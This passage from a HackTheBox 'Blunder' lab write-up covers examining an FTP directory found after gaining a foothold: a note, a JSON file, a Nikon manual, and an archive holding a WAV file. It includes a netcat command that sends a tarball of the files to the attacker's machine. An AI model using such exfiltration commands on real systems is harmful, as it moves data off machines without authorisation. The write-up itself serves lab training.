FTP
I have initially found the target FTP instance to be very strange as it was included in the returned Nmap data despite of the state being “closed” At a later stage, a note present in the web server revealed that the FTP instance was intended to be closed by admins
Upon gaining a foothold to the target system, PEAS has reminded me of the FTP instance and its presence
www-data@blunder:/$ ll ftp
total 11M
4.0K drwxr-xr-x 21 root root 4.0K Jul 6 2021 ..
4.0K drwxr-xr-x 2 nobody nogroup 4.0K Nov 27 2019 .
4.0K -rw-r--r-- 1 root root 260 Nov 27 2019 note.txt
4.0K -rw-r--r-- 1 root root 828 Nov 27 2019 config.json
11M -rw-r--r-- 1 root root 11M Nov 27 2019 D5100_EN.pdf
268K -rw-r--r-- 1 root root 265K Nov 27 2019 configThere are 4 files within the “unexpected” FTP directory; /ftp
www-data@blunder:/dev/shm$ tar -czf ftp.tar.gz ./ftp
www-data@blunder:/dev/shm$ nc 10.10.14.17 2222 < ./ftp.tar.gz
┌──(kali㉿kali)-[~/archive/htb/labs/blunder]
└─$ nnc 2222 > ftp.tar.gz
listening on [any] 2222 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.191] 55254I will transfer them all to Kali for detailed examination
┌──(kali㉿kali)-[~/archive/htb/labs/blunder]
└─$ tar -xf ftp.tar.gzExtracting content
note.txt
┌──(kali㉿kali)-[~/…/htb/labs/blunder/ftp]
└─$ cat note.txt
Hey Sophie
I've left the thing you're looking for in here for you to continue my work
when I leave. The other thing is the same although Ive left it elsewhere too.
Its using the method we talked about; dont leave it on a post-it note this time!
Thanks
ShaunThe note.txt file is a note to someone named, Sophie, left by the shaun user
The note itself appears to be very vague as context is missing
config.json
┌──(kali㉿kali)-[~/…/htb/labs/blunder/ftp]
└─$ cat config.json
{
"squadname": "Super hero squad",
"hometown": "Metro City",
"formed": 2016,
"secretbase": "Super tower",
"active": true,
"members": [
{
"name": "Molecule Man",
"age": 29,
"secretidentity": "Dan Jukes",
"powers": [
"Radiation resistance",
"Turning tiny",
"Radiation blast"
]
},
{
"name": "Madame Uppercut",
"age": 39,
"secretidentity": "Jane Wilson",
"powers": [
"Million tonne punch",
"Damage resistance",
"Superhuman reflexes"
]
},
{
"name": "Eternal Flame",
"age": 1000000,
"secretidentity": "Unknown",
"powers": [
"Immortality",
"Heat Immunity",
"Inferno",
"Teleportation",
"Interdimensional travel"
]
}
]
}The config.json file contains some arbitrary text
D5100_EN.pdf
The D5100_EN.pdf file is an official User’s Manual for the D5100 DSLR camera
Metadata
┌──(kali㉿kali)-[~/…/htb/labs/blunder/ftp]
└─$ exiftool D5100_EN.pdf
exiftool version number : 12.65
file name : D5100_EN.pdf
directory : .
file size : 11 MB
file modification date/time : 2023:09:18 08:55:41+02:00
file access date/time : 2023:09:18 14:54:12+02:00
file inode change date/time : 2023:09:18 14:51:36+02:00
file permissions : -rw-r--r--
file type : PDF
file type extension : pdf
mime type : application/pdf
pdf version : 1.4
linearized : No
page mode : UseOutlines
xmp toolkit : 3.1-702
producer : Acrobat Distiller 7.0 (Windows)
creator tool : PScript5.dll Version 5.2.2
modify date : 2011:07:19 18:20:03+09:00
create date : 2011:02:07 14:01:37+09:00
metadata date : 2011:07:19 18:20:03+09:00
document id : uuid:aedc180a-9fd9-481c-a613-3831cddfe7f8
instance id : uuid:b1b06c89-d3ae-49af-a9f7-884953ea7d7d
format : application/pdf
title :
creator : Nikon Corporation
page count : 92
page layout : SinglePage
author : Nikon Corporation
warning : [Minor] Ignored duplicate Info dictionaryconfig
┌──(kali㉿kali)-[~/…/htb/labs/blunder/ftp]
└─$ file config
config: gzip compressed data, from Unix, original size modulo 2^32 286720The config file is rather interesting as it contains a long string of binary data
It seems to be an archive file
┌──(kali㉿kali)-[~/…/htb/labs/blunder/ftp]
└─$ cp config config.tar.gz ; tar -xvf config.tar.gz
buzz.wavThe archive contains a single WAV file; buzz.wav
buzz.wav
┌──(kali㉿kali)-[~/…/htb/labs/blunder/ftp]
└─$ open buzz.wav
VLC media player 3.0.18 Vetinari (revision 3.0.13-8-g41878ff4f2)
┌──(kali㉿kali)-[~/…/htb/labs/blunder/ftp]
└─$ [000055b9c4326550] main libvlc: Running vlc with the default interface. Use 'cvlc' to use vlc without interface.The buzz.wav file contains nothing informatic but whitenoise
Metadata
┌──(kali㉿kali)-[~/…/htb/labs/blunder/ftp]
└─$ exiftool buzz.wav
ExifTool Version Number : 12.65
File Name : buzz.wav
Directory : .
File Size : 284 kB
File Modification Date/Time : 2019:11:27 12:30:04+01:00
File Access Date/Time : 2023:09:18 14:59:29+02:00
File Inode Change Date/Time : 2023:09:18 14:59:01+02:00
File Permissions : -rw-r--r--
File Type : WAV
File Type Extension : wav
MIME Type : audio/x-wav
Encoding : Microsoft PCM
Num Channels : 2
Sample Rate : 44100
Avg Bytes Per Sec : 176400
Bits Per Sample : 16
Manufacturer : 0
Product : 0
Sample Period : 22676
MIDI Unity Note : 60
MIDI Pitch Fraction : 0
SMPTE Format : none
SMPTE Offset : 00:00:00:00
Num Sample Loops : 1
Sampler Data Len : 0
Sampler Data : (Binary data 20 bytes, use -b option to extract)
Acidizer Flags : Stretch
Root Note : High C
Beats : 4
Meter : 4/4
Tempo : 150
Software : FL Studio 10
Duration : 1.61 s
┌──(kali㉿kali)-[~/…/htb/labs/blunder/ftp]
└─$ exiftool -b buzz.wav
12.65buzz.wav.2838902019:11:27 12:30:04+01:002023:09:18 14:59:29+02:002023:09:18 14:59:01+02:00100644WAVWAVaudio/x-wav1244100176400160022676600000:00:00:0010�46044 4150FL Studio 101.6093537414966